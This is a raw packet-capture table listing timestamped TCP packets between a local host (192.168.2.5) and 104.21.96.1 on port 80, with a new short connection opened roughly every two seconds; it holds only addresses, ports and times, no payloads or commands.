Feb 25, 2025 05:25:11.018450022 CET	50010	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:11.023577929 CET	80	50010	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:11.023665905 CET	50010	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:11.025738001 CET	50010	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:11.030827045 CET	80	50010	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:11.030905008 CET	50010	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:11.035927057 CET	80	50010	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:11.823061943 CET	80	50010	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:11.823240995 CET	50010	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:11.824501991 CET	80	50010	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:11.824556112 CET	50010	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:11.828358889 CET	80	50010	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:12.987519979 CET	50011	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:12.992697001 CET	80	50011	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:12.992798090 CET	50011	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:12.994770050 CET	50011	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:12.999871016 CET	80	50011	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:12.999938965 CET	50011	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:13.005290031 CET	80	50011	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:13.772494078 CET	80	50011	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:13.772613049 CET	50011	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:13.773591995 CET	80	50011	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:13.773642063 CET	50011	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:13.777704000 CET	80	50011	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:14.930890083 CET	50012	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:14.936116934 CET	80	50012	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:14.936239004 CET	50012	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:14.938050032 CET	50012	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:14.943144083 CET	80	50012	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:14.943217993 CET	50012	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:14.948299885 CET	80	50012	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:15.688381910 CET	80	50012	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:15.688616037 CET	50012	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:15.689112902 CET	80	50012	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:15.689163923 CET	50012	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:15.693671942 CET	80	50012	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:16.828824997 CET	50013	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:16.834590912 CET	80	50013	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:16.834669113 CET	50013	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:16.836450100 CET	50013	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:16.841511011 CET	80	50013	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:16.841564894 CET	50013	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:16.846651077 CET	80	50013	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:17.605642080 CET	80	50013	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:17.605901957 CET	50013	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:17.606646061 CET	80	50013	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:17.606704950 CET	50013	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:17.611001968 CET	80	50013	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:18.770258904 CET	50014	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:18.777776003 CET	80	50014	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:18.777892113 CET	50014	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:18.779872894 CET	50014	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:18.785756111 CET	80	50014	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:18.785841942 CET	50014	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:18.791640997 CET	80	50014	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:19.405771971 CET	80	50014	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:19.405903101 CET	50014	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:19.406065941 CET	80	50014	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:19.406121016 CET	50014	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:19.410940886 CET	80	50014	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:20.569329977 CET	50015	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:20.574866056 CET	80	50015	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:20.574939013 CET	50015	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:20.576951981 CET	50015	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:20.582010984 CET	80	50015	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:20.582159996 CET	50015	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:20.587383986 CET	80	50015	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:21.304136992 CET	80	50015	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:21.304486036 CET	80	50015	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:21.306113005 CET	50015	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:21.306204081 CET	50015	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:21.311198950 CET	80	50015	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:22.487430096 CET	50016	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:22.492667913 CET	80	50016	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:22.492763042 CET	50016	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:22.494730949 CET	50016	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:22.499763012 CET	80	50016	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:22.499828100 CET	50016	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:22.504885912 CET	80	50016	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:23.266937017 CET	80	50016	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:23.267064095 CET	50016	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:23.268112898 CET	80	50016	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:23.268161058 CET	50016	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:23.272185087 CET	80	50016	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:24.409717083 CET	50017	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:24.414967060 CET	80	50017	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:24.415075064 CET	50017	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:24.417159081 CET	50017	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:24.422251940 CET	80	50017	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:24.422327042 CET	50017	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:24.427360058 CET	80	50017	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:25.153019905 CET	80	50017	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:25.153136969 CET	50017	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:25.154200077 CET	80	50017	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:25.154247999 CET	50017	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:25.158253908 CET	80	50017	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:26.306879997 CET	50018	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:26.312043905 CET	80	50018	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:26.312159061 CET	50018	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:26.315150976 CET	50018	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:26.320195913 CET	80	50018	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:26.320259094 CET	50018	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:26.325248957 CET	80	50018	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:27.054311037 CET	80	50018	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:27.054481030 CET	50018	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:27.055634022 CET	80	50018	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:27.055684090 CET	50018	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:27.059485912 CET	80	50018	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:28.207442999 CET	50019	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:28.212614059 CET	80	50019	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:28.212693930 CET	50019	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:28.214761019 CET	50019	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:28.219749928 CET	80	50019	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:28.219808102 CET	50019	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:28.224818945 CET	80	50019	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:28.971689939 CET	80	50019	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:28.971803904 CET	50019	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:28.973546028 CET	80	50019	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:28.973598003 CET	50019	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:28.977408886 CET	80	50019	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:30.128320932 CET	50020	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:30.133667946 CET	80	50020	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:30.133755922 CET	50020	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:30.135705948 CET	50020	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:30.140795946 CET	80	50020	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:30.140837908 CET	50020	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:30.145796061 CET	80	50020	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:30.941464901 CET	80	50020	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:30.941622972 CET	50020	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:30.942080975 CET	80	50020	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:30.942140102 CET	50020	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:30.946727037 CET	80	50020	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:32.120434046 CET	50021	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:32.126188040 CET	80	50021	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:32.126373053 CET	50021	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:32.128465891 CET	50021	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:32.133960962 CET	80	50021	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:32.134031057 CET	50021	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:32.138976097 CET	80	50021	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:32.905833960 CET	80	50021	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:32.905994892 CET	50021	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:32.906089067 CET	80	50021	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:32.906132936 CET	50021	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:32.914062023 CET	80	50021	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:34.066915989 CET	50022	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:34.072056055 CET	80	50022	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:34.072159052 CET	50022	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:34.074167967 CET	50022	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:34.079193115 CET	80	50022	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:34.079241991 CET	50022	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:34.084194899 CET	80	50022	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:34.791112900 CET	80	50022	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:34.791279078 CET	80	50022	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:34.791351080 CET	50022	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:34.791351080 CET	50022	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:34.796366930 CET	80	50022	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:35.957866907 CET	50023	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:35.963088036 CET	80	50023	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:35.963175058 CET	50023	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:35.965142012 CET	50023	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:35.970181942 CET	80	50023	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:35.970246077 CET	50023	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:35.975280046 CET	80	50023	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:36.740041971 CET	80	50023	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:36.740192890 CET	50023	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:36.740808964 CET	80	50023	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:36.740863085 CET	50023	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:36.745245934 CET	80	50023	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:37.896460056 CET	50024	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:37.901644945 CET	80	50024	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:37.901740074 CET	50024	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:37.903537035 CET	50024	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:37.908616066 CET	80	50024	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:37.908677101 CET	50024	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:37.913794994 CET	80	50024	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:38.669800043 CET	80	50024	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:38.670015097 CET	80	50024	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:38.670109987 CET	50024	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:38.670154095 CET	50024	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:38.675147057 CET	80	50024	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:39.820427895 CET	50025	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:39.825623989 CET	80	50025	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:39.827701092 CET	50025	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:39.827701092 CET	50025	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:39.832735062 CET	80	50025	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:39.832786083 CET	50025	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:39.837769032 CET	80	50025	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:40.573344946 CET	80	50025	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:40.573704958 CET	50025	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:40.574105978 CET	80	50025	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:40.574173927 CET	50025	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:40.578794956 CET	80	50025	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:41.743474960 CET	50026	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:41.748656988 CET	80	50026	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:41.748730898 CET	50026	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:41.750845909 CET	50026	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:41.755844116 CET	80	50026	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:41.755922079 CET	50026	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:41.760982037 CET	80	50026	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:42.543618917 CET	80	50026	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:42.543708086 CET	80	50026	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:42.543812990 CET	50026	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:42.543845892 CET	50026	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:42.548921108 CET	80	50026	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:43.696454048 CET	50027	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:43.701683998 CET	80	50027	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:43.701782942 CET	50027	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:43.703857899 CET	50027	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:43.708923101 CET	80	50027	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:43.709003925 CET	50027	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:43.714148998 CET	80	50027	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:44.428369999 CET	80	50027	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:44.429465055 CET	80	50027	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:44.429533005 CET	50027	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:44.434537888 CET	50027	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:44.439591885 CET	80	50027	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:45.748296976 CET	50028	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:45.753632069 CET	80	50028	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:45.756351948 CET	50028	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:45.758398056 CET	50028	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:45.763494015 CET	80	50028	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:45.764297009 CET	50028	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:45.769396067 CET	80	50028	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:46.524693966 CET	80	50028	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:46.524821043 CET	50028	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:46.525007010 CET	80	50028	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:46.525058031 CET	50028	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:46.529931068 CET	80	50028	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:47.681080103 CET	50029	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:47.686418056 CET	80	50029	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:47.686609030 CET	50029	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:47.688956022 CET	50029	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:47.694051027 CET	80	50029	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:47.694139004 CET	50029	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:47.699184895 CET	80	50029	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:48.450730085 CET	80	50029	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:48.450829983 CET	50029	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:48.451639891 CET	80	50029	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:48.451689959 CET	50029	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:48.455909014 CET	80	50029	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:49.754065037 CET	50030	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:49.759263039 CET	80	50030	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:49.759361029 CET	50030	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:49.777595043 CET	50030	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:49.782735109 CET	80	50030	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:49.782795906 CET	50030	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:49.787875891 CET	80	50030	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:50.490956068 CET	80	50030	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:50.491076946 CET	50030	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:50.491228104 CET	80	50030	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:50.491277933 CET	50030	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:50.496608973 CET	80	50030	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:51.671998978 CET	50031	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:51.677198887 CET	80	50031	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:51.677314997 CET	50031	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:51.679333925 CET	50031	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:51.684376955 CET	80	50031	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:51.686455965 CET	50031	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:51.691555023 CET	80	50031	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:52.471117020 CET	80	50031	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:52.472286940 CET	80	50031	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:52.472349882 CET	50031	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:52.475012064 CET	50031	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:52.480047941 CET	80	50031	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:53.650609970 CET	50032	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:53.655718088 CET	80	50032	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:53.655791044 CET	50032	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:53.657907963 CET	50032	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:53.662957907 CET	80	50032	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:53.663006067 CET	50032	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:53.668005943 CET	80	50032	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:54.438973904 CET	80	50032	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:54.439089060 CET	50032	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:54.440046072 CET	80	50032	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:54.440118074 CET	50032	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:54.444103956 CET	80	50032	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:55.583120108 CET	50033	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:55.588340044 CET	80	50033	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:55.588423967 CET	50033	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:55.590445042 CET	50033	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:55.595469952 CET	80	50033	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:55.595532894 CET	50033	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:55.600553989 CET	80	50033	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:56.310067892 CET	80	50033	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:56.310384989 CET	50033	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:56.310420036 CET	80	50033	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:56.310487986 CET	50033	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:56.315498114 CET	80	50033	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:57.463690042 CET	50034	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:57.468976974 CET	80	50034	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:57.469367027 CET	50034	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:57.472239971 CET	50034	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:57.477267981 CET	80	50034	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:57.477338076 CET	50034	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:57.482455969 CET	80	50034	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:58.267930984 CET	80	50034	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:58.268081903 CET	50034	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:58.268662930 CET	80	50034	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:58.268726110 CET	50034	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:58.273277998 CET	80	50034	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:59.447355032 CET	50035	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:59.452598095 CET	80	50035	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:59.452685118 CET	50035	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:59.455275059 CET	50035	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:59.460318089 CET	80	50035	104.21.96.1	192.168.2.5
Feb 25, 2025 05:25:59.460376978 CET	50035	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:25:59.465359926 CET	80	50035	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:00.224647999 CET	80	50035	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:00.224885941 CET	50035	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:00.225286007 CET	80	50035	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:00.225352049 CET	50035	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:00.229947090 CET	80	50035	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:01.385600090 CET	50036	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:01.390815973 CET	80	50036	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:01.390944958 CET	50036	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:01.393002033 CET	50036	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:01.398104906 CET	80	50036	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:01.398189068 CET	50036	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:01.403302908 CET	80	50036	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:02.181185007 CET	80	50036	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:02.181519032 CET	50036	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:02.181842089 CET	80	50036	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:02.181915998 CET	50036	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:02.186609983 CET	80	50036	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:03.434618950 CET	50037	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:03.439835072 CET	80	50037	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:03.440017939 CET	50037	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:03.443218946 CET	50037	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:03.448282003 CET	80	50037	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:03.448369980 CET	50037	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:03.453397036 CET	80	50037	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:04.182133913 CET	80	50037	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:04.182457924 CET	50037	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:04.182475090 CET	80	50037	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:04.182543039 CET	50037	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:04.188034058 CET	80	50037	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:05.356398106 CET	50038	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:05.361589909 CET	80	50038	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:05.364398956 CET	50038	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:05.366341114 CET	50038	80	192.168.2.5	104.21.96.1
